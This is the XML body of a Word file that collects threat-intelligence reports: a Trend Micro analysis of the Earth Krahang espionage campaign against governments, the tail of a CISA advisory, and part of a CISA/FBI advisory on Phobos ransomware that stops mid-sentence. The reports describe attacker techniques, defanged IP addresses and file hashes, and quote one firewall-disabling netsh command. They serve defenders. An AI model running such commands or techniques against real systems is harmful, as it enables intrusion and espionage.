entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ACKNOWLEDGEMENTS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Cisco and Sophos contributed to this advisory. VERSION HISTORY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April 18, 2024: Initial version.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2024.04.18 20:54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks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Since early 2022, we have been monitoring an APT campaign that targets several government entities worldwide, with a strong focus in Southeast Asia, but also seen targeting Europe, America, and Africa.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Joseph C Chen, Daniel Lunghi March 18, 2024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Subscribe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Introduction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Since early 2022, we have been monitoring an APT campaign that targets several government entities worldwide, with a strong focus in Southeast Asia, but also seen targeting Europe, America, and Africa. The threat actor exploits public-facing servers and sends spear phishing emails to deliver previously unseen backdoors.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Our research allowed us to identify the campaign's multiple connections with a China-nexus threat actor we track as Earth Lusca. However, since the campaign employs independent infrastructure and unique backdoors, we believe it to be a separate intrusion set that we named Earth Krahang. We will examine these connections, as well as potential links to a Chinese company named I-Soon, in a separate section.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One of the threat actor's favorite tactics involves using its malicious access to government infrastructure to attack other government entities, abusing the infrastructure to host malicious payloads, proxy attack traffic, and send spear-phishing emails to government-related targets using compromised government email accounts. Earth Krahang also uses other tactics, such as building VPN servers on compromised public-facing servers to establish access into the private network of victims and performing brute-force attacks to obtain email credentials. These credentials are then used to exfiltrate victim emails, with the group's ultimate goal being cyberespionage.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Due to mistakes on the attacker's side, we managed to retrieve multiple files from Earth Krahang's servers, including samples, configuration files, and log files from its attack tools. Combining this information with our telemetry helped us understand the Earth Krahang operation and build a clear view of the threat actor's victimology and interests. In addition, we will also share their preferred malware families and post-exploitation tools in this report.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Reconnaissance and initial access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 Infection chain of an Earth Krahang's spear-phishing attack (see the MITRE ATT&amp;CK section for the details of each technique ID)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One of the infection vectors used involves the scanning of public-facing servers. Earth Krahang heavily employs open-source scanning tools that perform recursive searches of folders such as .git or .idea. The threat actor also resorts to simply brute-forcing directories to help identify files that may contain sensitive information such as file paths or passwords on the victim's servers. They also tend to examine the subdomains of their targets to find interesting and possible unmaintained servers. Earth Krahang also conducts vulnerability scanning with tools like sqlmap, nuclei, xray, vscan, pocsuite, and wordpressscan to find web server vulnerabilities that will allow them to access the server, drop web shells, and install backdoors.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threat actor abused the following vulnerabilities multiple times: CVE-2023-32315: command execution on OpenFire CVE-2022-21587: command execution on Oracle Web Applications Desktop Integrator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Earth Krahang also makes use of spear phishing email to attack its targets. Like most spear phishing attacks, the emails are intended trick their targets into opening attachments or embedded URL links that ultimately lead to the execution of a prepared backdoor file on the victim's machine. Our telemetry data and some of the group's backdoors uploaded on VirusTotal revealed that the backdoor filenames are usually related to geopolitical topics, indicating their preferred type of lure: "Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe" .rar (translated as "Notice of complaint.rar") " . . - as of 25 Feb 2022.doc.exe" (translated as "Draft Cabinet status of Thailand-Romania as of 25 Feb 2022.doc.exe") "Malaysian defense minister visits Hungary.Malaysian defense minister visits Hungary.exe" "ICJ public hearings- Guyana vs. Venezuela.ICJ public hearings- Guyana vs. Venezuela.exe" "On the visit of Paraguayan Foreign Minister to Turkmenistan.exe" "pay-slip run persal payslip.pay-slip run persal payslip.docx.exe"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 noticed that Earth Krahang retrieves hundreds of email addresses from their targets during the reconnaissance phase. In one case, the actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses belonging to the same entity. The malicious attachment was a RAR archive containing an LNK file that deployed the Xdealer malware (which we will discuss in the Delivered malware families section) and opened a decoy document (available online) related to the governmental entity. It is likely that the actor discovered the weak credentials of the compromised mailbox using brute-forcing tools.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Earth Krahang abuses the trust between governments to conduct their attacks. We found that the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails. Since the malicious link uses a legitimate government domain of the compromised server, it will appear less suspicious to targets and may even bypass some domain blacklists.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In addition, the actor used a compromised government email account to send email to other governments. We noticed the following email subjects being used for spear-phishing emails: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salary Malaysian Ministry of Defense Circular Malaysian defense minister visits Hungary ICJ public hearings- Guyana vs. Venezuela About Guyana Procurement Proposal for Taiwan &lt;redacted&gt;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2. The Python script used by Earth Krahang to send spear-phishing emails to other governments via a stolen government account (redacted)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Our telemetry also showed that the threat actor compromised a government web server and leveraged it to scan vulnerabilities in other government targets. Post-exploitation TTPs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threat actor installs the SoftEther VPN on compromised public-facing servers and uses certutil commands to download and install the SoftEther VPN server. The SoftEther server executable is renamed to either taskllst.exe, tasklist.exe, or tasklist_32.exe for the Windows executable and curl for the Linux executable to make it look like a legitimate file on the installed system. With the VPN server installed, the actor can then connect to the victim's network to conduct their post-exploitation movements.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Additional post-exploitation movements include: Maintaining backdoor persistence with task scheduling Enabling Remote Desktop connections by modifying the Windows Registry "fDenyTSConnections" Accessing credentials by dumping Local Security Authority Subsystem Service (LSASS) with Mimikatz or ProcDump Accessing credentials by dumping the SAM database (HKLM/sam) from the Windows Registry Scanning the network using Fscan Lateral code execution via WMIC Using tools such as BadPotato, SweetPotato, GodPotato, or PrinterNotifyPotato for privilege escalation on Windows systems Exploiting CVE-2021-4034, CVE-2021-22555, and CVE-2016-5195 for privilege escalation on Linux systems Email exfiltration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 observed Earth Krahang conducting brute force attacks on Exchange servers via their Outlook on the web (formerly known as Outlook Web Access, or OWA) portals of its victims. The threat uses a list of common passwords to test the email accounts on the target's email server. We have observed the group using a custom Python script targeting the ActiveSync service on the OWA server to perform their brute-force attack.</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 also found the threat actor using the open-source tool ruler to brute force email accounts and passwords. Email accounts using weak passwords can be identified by the attacker, who can then perform email exfiltration or abuse the compromised account to send spear phishing emails (as we discussed earlier).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 also identified another Python script that the actor used to exfiltrate emails from a Zimbra mail server. The script can package the victim's mailbox via the mail server API using an authenticated cookie stolen by the threat actor. However, our investigation was unable to determine how the authenticated tokens were stolen from the victim's server.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3. The Python script used by Earth Krahang to exfiltrate the victim's mailbox</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Delivered malware families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Earth Krahang delivers backdoors to establish access to victim machines. Cobalt Strike and two custom backdoors, RESHELL and XDealer, were employed during the initial stage of attack. We found that these backdoors were delivered either through spear-phishing emails or deployed via web shell on compromised servers.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 found the RESHELL backdoor being used several times in attacks during 2022. It was mentioned being used in a targeted attack against a Southeast Asian government by Palo Alto in a previous research report. RESHELL is a simple .NET backdoor that possesses the basic capabilities of collecting information, dropping files, or executing system commands. Its binaries are packed with ConfuserEX and its command-and-control (C&amp;C) communication is encrypted with the AES algorithm.</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Since 2023, the Earth Krahang shifted to another backdoor (named XDealer by TeamT5 and DinodasRAT by ESET). Compared to RESHELL, XDealer provides more comprehensive backdoor capabilities. In addition, we found that the threat actor employed both Windows and Linux versions of XDealer to target different systems.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Each XDealer sample embeds a mark string that represents the backdoor's version. We observed the following marks: Mark First seen` Platform Win_%s_%s_%u_V10 2023-09 Windows Din_%s_%s_%u_V12 2023-04 Windows Din_%s_%s_%u_V10 2023-04 Windows Linux_%s_%s_%u_V10 2023-01 Linux Win_%s_%s_%u_V6 2022-10 Windows Din_%s_%s_%u_V1 2022-09 Windows Rin_%s_%s_%u_V6 2021-04 Windows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 The list of the identified marks embedded on XDealer samples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finding indicates that the backdoor may have been used in the wild for some time now and is still under active development.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It's worth noting that many early XDealer samples were developed as a DLL file packaged with an installer, a stealer module DLL, a text file contents ID string, and an LNK file. The LNK file executes the installer, which then installs the XDealer DLL and the stealer module DLL on the victim's machine. The stealer module can take screenshots, steal clipboard data, and log keystrokes.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one case, we found that the LNK file was replaced with another executable, which is an installer loader (it's likely that Earth Krahang employed a different execution scheme instead of a standalone executable). Furthermore, we found that some of the XDealer DLL loaders were signed with valid code signing certificates issued by GlobalSign to two Chinese companies. According to public information available on the internet, one is a human resource company, while the other is a game development company. It's likely that their certificates were stolen and abused to sign malicious executables.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Package name Installer XDealer DLL Screenshot module DLL ID file LNK/Loader GoogleVaS RuntimeInit.exe 1.dll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.dll id.data RuntimeInit.lnk GoogleUps GoogleUpdate.exe 1.dll 2.dll Id.data GoogleUpdate.lnk GoogleInc GoogleUpdate.exe twain_64.dll advapi64.dll - svrhost.exe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2. The list of packages delivering XDealer DLL and other files Certificate hash Certificate be9de0d818b4096d80ce7d88110917b2a4e8273f be31e841820586e9106407d78ae190915f2c012d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3. The list of certificates abused to sign the XDealer loader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Cobalt Strike was also frequently used during the initial stage of an attack. Interestingly, we found that instead of the typical Cobalt Strike usage, Earth Krahang adds additional protection to their C&amp;C server through the adoption of the open-source project RedGuard, which is basically a proxy that helps red teams hinder the discovery of their Cobalt Strike C&amp;C profile.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threat actor abused RedGuard to prevent its C&amp;C servers from being identified by blue team Cobalt Strike C&amp;C scanners or search engine web crawlers. It also helps the group monitor who is collecting their C&amp;C profiles. We found that Earth Krahang's C&amp;C server redirected invalid C&amp;C requests to security vendor websites due to RedGuard's protections.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Cobalt Strike exploits the DLL side-loading vulnerability. In one case we analyzed, the threat actor dropped three files, fontsets.exe, faultrep.dll, and faultrep.dat. The file fontsets.exe (SHA256: 97c668912c29b8203a7c3bd7d5d690d5c4e5da53) is a legitimate executable that was abused to side-load the DLL file faultrep.dll (SHA256: a94d0e51df6abbc4a7cfe84e36eb8f38bc011f46).</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faultrep.dll file is a custom shellcode loader that will decode the encoded shellcode - which is Cobalt Strike - stored inside faultrep.dat. We also found another DLL loader with a similar decoding routine, but with different byte values for decoding and loads shellcode from a different filename (conf.data).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Using our telemetry data, we found that the threat actor also dropped PlugX and ShadowPad samples in victim environments. The PlugX sample, named fualtrep.dll, is likely used for side-loading, similar to the Cobalt Strike routine mentioned above. The ShadowPad samples had the exact same characteristics as seen in our previous Earth Lusca report. Victimology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 found approximately 70 different victims (organizations that were confirmed to be compromised) spread across 23 different countries. Since we had access to some of Earth Krahang's logs, we were also able to identify 116 different targets (including those that were not confirmed to be compromised) in 35 countries.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total, the threat actor was able to compromise or target victims in 45 different countries spread across different regions, most of them in Asia and America, but also in Europe and Africa.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4. The map of victims targeted by Earth Krahang (countries in red are those that at least one entity compromised, while countries in yellow are those with at least one entity targeted)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Government organizations seem to be Earth Krahang's primary targets. As an example, in the case of one country, we found that the threat actor compromised a diverse range of organizations belonging to 11 different government ministries.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 found that at least 48 government organizations were compromised, with a further 49 other government entities being targeted. Foreign Affairs ministries and departments were a top target, compromising 10 such organizations and targeting five others.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Education is another sector of interest to the threat actor. We found at least two different victims and 12 targets belonging to this sector. The communications industry was also targeted; we found multiple compromised telecommunications providers. Other target organizations and entities include post offices (targeted in at least three different countries), logistics platforms, and job services.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were other industries targeted, but on a smaller scale, including the following: Finance/Insurance Foundations/NGOs/Thinkthanks Healthcare IT Manufacturing Media Military Real estate Retail Sports Tourism Attribution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Initially, we had no attribution for this campaign since we found no infrastructure overlaps, and had never seen the RESHELL malware family before. Palo Alto published a report that attributes, with moderate confidence, a particular cluster using RESHELL malware to GALLIUM. However, the assessment is based on a toolset that is shared among many different threat actors, and we were hesitant to use this link for proper attribution. We also considered the possibility that RESHELL is a shared malware family.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Earth Krahang switched to the XDealer malware family in later campaigns. In a research paper presented by TeamT5, XDealer was shown to be associated with Luoyu, a threat actor with Chinese origins that used the WinDealer and ReverseWindow malware families. Our colleague, who was previously involved in the research of Luoyu, shared with us the insights on this association, particularly the sharing of an encryption key between an old XDealer sample and a SpyDealer sample - suggesting a connection between both malware families. ESET, which named this malware DinodasRAT, wrote an extensive report on its features. However they had no particular attribution apart from the possible China-nexus origin.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we believe it could be possible that this campaign has links to LuoYu, we found no traces of other malware families used by this threat actor. Also, the encryption key mentioned above is different from the samples we found in this campaign, meaning that this malware family has multiple builders. This could suggest that either the key was changed at some point in development, or that the tool is shared among different groups.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In January 2022, we reported on a China-nexus threat actor we called Earth Lusca, following up with updates on their use of a newly discovered backdoor named SprySOCKS and their recent activities capitalizing on the Taiwanese </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>presidential election. During our investigation, we noticed malware being downloaded from IP addresses we attribute to Earth Lusca (45[.]32[.]33[.]17 and 207[.]148[.]75[.]122, for example) at the lateral movement stage of this campaign. This suggests a strong link between this threat actor and Earth Lusca. We also found infrastructure overlaps between some C&amp;C servers that communicated with malware we found during our investigation, and domain names such as googledatas[.]com that we attribute to Earth Lusca.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the infrastructure and the preference of the initial stage backdoors look to be very different between this new campaign and the previously reported activities of Earth Lusca, our speculation is that they are two intrusion sets running independently but targeting a similar range of victims, becoming more intertwined as they approach their goal - possibly even being managed by the same threat group. Due to these characteristics, we decided to give the independent name, Earth Krahang, to this intrusion set.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Our previous report suggests Earth Lusca might be the penetration team behind the Chinese company I-Soon, which had their information leaked on GitHub recently. Using this leaked information, we found that the company organized their penetration team into two different subgroups. This could be the possible reason why we saw two independent clusters of activities active in the wild but with limited association. Earth Krahang could be another penetration team under the same company. Conclusion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this report, we shared our investigation on a new campaign we named Earth Krahang. Our findings show that this threat actor focuses its efforts on government entities worldwide and abuses compromised government infrastructure to enable its malicious operations.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 were also able to identify two unique malware families used in Earth Krahang's attacks while also illustrating the larger picture involving the group's targets and malicious activities via our telemetry data and the exposed files on their servers.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Our investigation also identified multiple links between Earth Krahang and Earth Lusca. We suspected these two intrusion sets are managed by the same threat actor.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Given the importance of Earth Krahang's targets and their preference of using compromised government email accounts, we strongly advise organizations to adhere to security best practices, including educating employees and other individuals involved with the organization on how to avoid social engineering attacks, such as developing a healthy skepticism when it involves potential security issues, and developing habits such as refraining from clicking on links or opening attachments without verification from the sender. Given the threat actor's exploitation of vulnerabilities in its attacks, we also encourage organizations to update their software and systems with the latest security patches to avoid any potential compromise. Indicators of Compromise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indicators of compromise for this entry can be found here.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Acknowledgment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thanks to Leon M Chang who shared to us insights about the overlap of the TEA encryption key between XDealer and SpyDealer samples.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MITRE ATT&amp;CK</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listed techniques are a subset of the MITRE ATT&amp;CK list.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tactic Technique ID Reconnaissance Active Scanning: Scanning IP Blocks T1595.001 Active Scanning: Vulnerability Scanning T1595.002 Active Scanning: Wordlist Scanning T1595.003 Gether Victim Host Information T1592 Gether Victim Network Information T1590 Resource Development Acquire Infrastructure: Domains T1583.001 Acquire Infrastructure: Virtual Private Server T1583.003 Compromise Accounts: Email Account T1586.002 Compromise Infrastructure: Server T1584.004 Obtain Capabilities: Malware T1588.001 Obtain Capabilities: Code Signing Certificates T1588.003 Stage Capabilities: Upload Malware T1608.001 Stage Capabilities: Upload Tool T1608.002 Stage Capabilities: Link Target T1608.005 Initial Access Exploit Public-Facing Application T1190 Phishing: Spear phishing Attachment T1566.001 Phishing: Spear phishing Link T1566.002 Trusted Relationship T1199 Valid Accounts T1078 Execution Command and Scripting Interpreter: PowerShell T1059.001 Command and Scripting Interpreter: Windows Command Shell T1059.003 Command and Scripting Interpreter: Python T1059.006 Exploitation for Client Execution T1203 System Services: Service Execution T1569.002 User Execution: Malicious File T1204.002 Windows Management Instrumentation T1047 Persistence Create or Modify System Process: Windows Service T1543.003 External Remote Services T1133 Scheduled Task/Job: Scheduled Task T1053.005 Server Software Component: Web Shell T1505.003 Privilege Escalation Exploitation for Privilege Escalation T1068 Valid Accounts: Local Accounts T1078.003 Defense Evasion Deobfuscate/Decode Files or Information T1140 Hijack Execution Flow: DLL Side-Loading T1574.002 Impersonation T1656 Masquerading: Match Legitimate Name or Location T1036.005 Masquerading: Double File Extension T1036.007 Modify Registry T1112 Credential Access Brute Force: Password Spraying T1110.003 OS Credential Dumping: LSASS Memory T1003.001 OS Credential Dumping: Security Account Manager T1003.002 Steal Web Session Cookie T1539 Discovery Account Discovery: Local Account T1087.001 Account Discovery: Domain Account T1087.002 Permission Groups Discovery: Domain Groups T1069.002 Process Discovery T1057 System Owner/User Discovery T1033 System Service Discovery T1007 Lateral Movement Exploitation of Remote Services T1210 Internal Spear phishing T1534 Remote Services: Windows Remote Management T1021.006 Collection Automated Collection T1119 Email Collection T1114 Command and Control Application Layer Protocol: Web Protocols T1071.001 Encrypted Channel: Symmetric Cryptography T1573 Ingress Tool Transfer T1105 Protocol Tunneling T1572 Exfiltration Automated Exfiltration T1020</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>Trend Micro 2024.03.18 12:10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#StopRansomware: Phobos Ransomware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Last Revised February 29, 2024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Alert Code AA24-060A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Cyber Threats and Advisories, Malware, Phishing, and Ransomware, Incident Detection, Response, and Prevention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Actions to take today to mitigate Phobos ransomware activity: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Secure RDP ports to prevent threat actors from abusing and leveraging RDP tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Prioritize remediating known exploited vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement EDR solutions to disrupt threat actor memory allocation techniques.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SUMMARY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Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.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Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS- ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.[1],[2]</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FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Phobos ransomware and other ransomware incidents.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Download the PDF version of this report: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AA24-060A #StopRansomware: Phobos Ransomware (PDF, 677.95 KB )</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a downloadable copy of indicators of compromise (IOCs), see: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AA24-060A STIX XML (XML, 147.73 KB )</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AA24-060A STIX JSON (JSON, 119.53 KB ) TECHNICAL DETAILS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Note: This advisory uses the MITRE ATT&amp;CK for Enterprise framework, version 14. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors' activity mapped to MITRE ATT&amp;CK(R) tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool. Overview</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open source reporting, Phobos ransomware is likely connected to numerous variants (including Elking, Eight, Devos, Backmydata, and Faust ransomware) due to similar TTPs observed in Phobos intrusions. Phobos ransomware operates in conjunction with various open source tools such as Smokeloader, Cobalt Strike, and Bloodhound. These tools are all widely accessible and easy to use in various operating environments, making it (and associated variants) a popular choice for many threat actors.[3],[4] Reconnaissance and Initial Access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Phobos actors typically gain initial access to vulnerable networks by leveraging phishing campaigns [T1598] to drop hidden payloads or using internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for vulnerable Remote Desktop Protocol (RDP) ports [T1595.001] or by leveraging RDP on Microsoft Windows environments.[5],[6]</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Once they discover an exposed RDP service, the actors use open source brute force tools to gain access [T1110]. If Phobos actors gain successful RDP authentication [T1133][T1078] in the targeted environment, they perform open source research to create a victim profile and connect the targeted IP addresses to their associated companies [T1593]. Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network [T1219].[7]</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Alternatively, threat actors send spoofed email attachments [T1566.001] that are embedded with hidden payloads [T1204.002] such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. After SmokeLoader's hidden payload is downloaded onto the victim's system, threat actors use the malware's functionality to download the Phobos payload and exfiltrate data from the compromised system. Execution and Privilege Escalation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Phobos actors run executables like 1saas.exe or cmd.exe to deploy additional Phobos payloads that have elevated privileges enabled [TA0004]. Additionally, Phobos actors can use the previous commands to perform various windows shell functions. The Windows command shell enables threat actors to control various aspects of a system, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>with multiple permission levels required for different subsets of commands [T1059.003][T1105].[8] Smokeloader Deployment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Phobos operations feature a standard three phase process to decrypt a payload that allows the threat actors to deploy additional destructive malware.[9]</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the first phase, Smokeloader manipulates either VirtualAlloc or VirtualProtect API functions-which opens an entry point, enabling code to be injected into running processes and allowing the malware to evade network defense tools [T1055.002]. In the second phase, a stealth process is used to obfuscate command and control (C2) activity by producing requests to legitimate websites [T1001.003].[10]</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Within this phase, the shellcode also sends a call from the entry point to a memory container [T1055.004] and prepares a portable executable for deployment in the final stage [T1027.002][T1105][T1140].</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Finally, once Smokeloader reaches its third stage, it unpacks a program- erase cycle from stored memory, which is then sent to be extracted from a SHA 256 hash as a payload.[7] Following successful payload decryption, the threat actors can begin downloading additional malware. Additional Phobos Defense Evasion Capabilities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Phobos ransomware actors have been observed bypassing organizational network defense protocols by modifying system firewall configurations using commands like netsh firewall set opmode mode=disable [T1562.004].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Additionally, Phobos actors can evade detection by using the following tools: Universal Virus Sniffer, Process Hacker, and PowerTool [T1562]. Persistence and Privilege Escalation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open source reporting, Phobos ransomware uses commands such as Exec.exe or the bcdedit[.]exe control mechanism. Phobos has also been observed using Windows Startup folders and Run Registry Keys such as C:/Users\Admin\AppData\Local\directory [T1490][T1547.001] to maintain persistence within compromised environments.[5]</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Additionally, Phobos actors have been observed using built-in Windows API functions [T1106] to steal tokens [T1134.001], bypass access controls, and create new processes to escalate privileges by leveraging the SeDebugPrivilege process [T1134.002]. Phobos actors attempt to authenticate using cached password hashes on victim machines until they reach domain administrator access [T1003.005]. Discovery and Credential Access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Phobos actors additionally use open source tools [T1588.002] such as Bloodhound and Sharphound to enumerate the active directory [T1087.002]. Mimikatz and NirSoft, as well as Remote Desktop Passview to export browser client credentials [T1003.001][T1555.003], have also been used.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Furthermore, Phobos ransomware is able to enumerate connected storage devices [T1082], running processes [T1057], and encrypt user files [T1083]. Exfiltration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Phobos actors have been observed using WinSCP and Mega.io for file exfiltration.[11] They use WinSCP to connect directly from a victim network to an FTP server [T1071.002] they control [TA0010]. Phobos actors install Mega.io [T1048] and use it to export victim files directly to a cloud storage provider [T1567.002]. Data is typically archived as either a .rar or .zip file [T1560] to be later exfiltrated. They target legal documentation, financial records, technical documents (including network architecture), and databases for commonly used password management software [T1555.005]. Impact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the exfiltration phase, Phobos actors then hunt for backups. They use vssadmin.exe and Windows Management Instrumentation command-line utility (WMIC) to discover and delete volume shadow copies in Windows environments. This prevents victims from recovering files after encryption has taken place [T1047][T1490].</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Phobos.exe contains functionality to encrypt all connected logical drives on the target host [T1486]. Each Phobos ransomware executable has unique build identifiers (IDs), affiliate IDs, as well as a unique ransom note which is embedded in the executable. After the ransom note has populated on infected workstations, Phobos ransomware continues to search for and encrypt additional files.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extortion [T1657] occurs via email; however, some affiliate groups have used voice calls to contact victims. In some cases, Phobos actors have used onion sites to list victims and host stolen victim data. Phobos actors use various instant messaging applications such as ICQ, Jabber, and QQ to communicate [T1585]. See Figure 2 for a list of email providers used by the following 